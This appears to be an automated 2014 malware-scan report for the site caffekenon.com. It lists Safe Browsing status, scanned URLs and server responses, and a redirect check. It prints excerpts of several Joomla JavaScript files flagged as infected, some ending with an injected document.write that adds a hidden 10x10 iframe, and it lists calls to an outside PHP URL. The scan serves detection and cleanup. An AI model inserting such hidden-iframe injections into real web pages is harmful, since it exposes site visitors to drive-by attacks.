Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caffekenon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://caffekenon.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 00:58:56 GMT Location: http://caffekenon.com/home Server: Apache Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | clean |
http://caffekenon.com/home | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 00:58:57 GMT Location: http://caffekenon.com/home/ Server: Apache Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | clean |
http://caffekenon.com/home/ | 200 OK Content-Length: 20964 Content-Type: text/html | clean |
http://caffekenon.com/home/media/system/js/caption.js | 200 OK Content-Length: 2099 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8229 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent=function(){var a=window.navigator.userAgent;Silverlight.ua={OS:"Unsupported",Browser:"Unsupported"};if(a.indexOf("Windows NT")>=0)Silverlight.ua.OS="Windows";else if(a.indexOf("PPC Mac OS X")>=0)Silverlight.ua.OS="MacPPC";else if(a.indexOf("Intel Mac OS X")>=0)Silverlight. Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16612 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260",image:"",backcolor:"FFFFFF",frontcolor:"000000",lightcolor:"000000",screencolor:"000000",width:"320",logo:"",overstretch:"false",showicons:"true",shownavigation:"true",showstop:"false",showdigits:"true",usefullscreen:"true",usemute:"false",autostart:"false",bufferlength:"3",duratio Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12390 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getElementsB Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2495 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API=function(B){var A=null;allvideos.APIs.each(function(C){if(C._pid==B){A=C}});if(A!=null){return A}this._pid=B;this._player=null;this._item=null;this._load=null;this._width=null;this._height=null;this._state=null;this._elapsed=null;this._remaining=null;this._volume=null;this._plCB=fu Antivirus reports:
| ||
http://caffekenon.com/home/modules/mod_jxtc_newspro/js/showcaseFX.js | 200 OK Content-Length: 17105 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof showcasefx != 'function') { function showcasefx(id, type, direction, sp, tsp, layer, transition){ var idx = $(id); if(idx){ var shows = idx.getElements('div[class=' + id + 'shows]'); var stotal = shows.length; var repeat; var wd = 0; var hg = 0; var finalhg = 0; var i = 0; var j = 1; var factor = 1; var aux; var op; var keepy; var keep = ''; var stnoplay = true; var t } }); } if(bac!=null){ bac.addEvent('click', function(e) { new Event(e).stop(); $clear(repeat); op = 'rev'; factor = -1; loop(); if (sp >= 0) { repeat = loop.periodical(timex); } }); } return true; } } }document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://caffekenon.com/home/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 9083 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Jax() {var loadingTimeout=400;var iframe;this.loadingFunction=function(){};this.doneLoadingFunction=function(){};this.stringify=function(arg){var c,i,l,o,u,v;switch(typeof arg){case'object':if(arg){if(arg.constructor==Array){o='';for(i=0;i<arg.length;++i){v=this.stringify(arg[i]);if(o&&(v!==u)){o+=',';} if(v!==u){o+=v;}} return'['+o+']';}else if(typeof arg.toString!='undefined'){o='';for(i in arg){v=this.stringify(arg[i]);if(v!==u){if(o){o+=',';} o+=this.strin else {if(objCheckbox[0].checked) {var value=objCheckbox[0].value;value=value.replace(/"/g,""");postData[postData.length]=new Array(assCheckbox[i],encodeURIComponent(value));}}}}}} return postData;}} function jax_iresponse(){jax.processIResponse();} var jax=new Jax();document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://distec-photos.fymaction.fr/xtbcwzvr.php?id=1638985 | 404 Not Found Content-Length: 302 Content-Type: text/html | clean |
http://distec-photos.fymaction.fr/test404page.js | 404 Not Found Content-Length: 304 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: caffekenon.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 00:58:56 GMT
Location: http://caffekenon.com/home
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
GET / HTTP/1.1
Host: caffekenon.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 00:58:56 GMT
Location: http://caffekenon.com/home
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: caffekenon.com
Referer: http://www.google.com/search?q=caffekenon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: caffekenon.com
Referer: http://www.google.com/search?q=caffekenon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.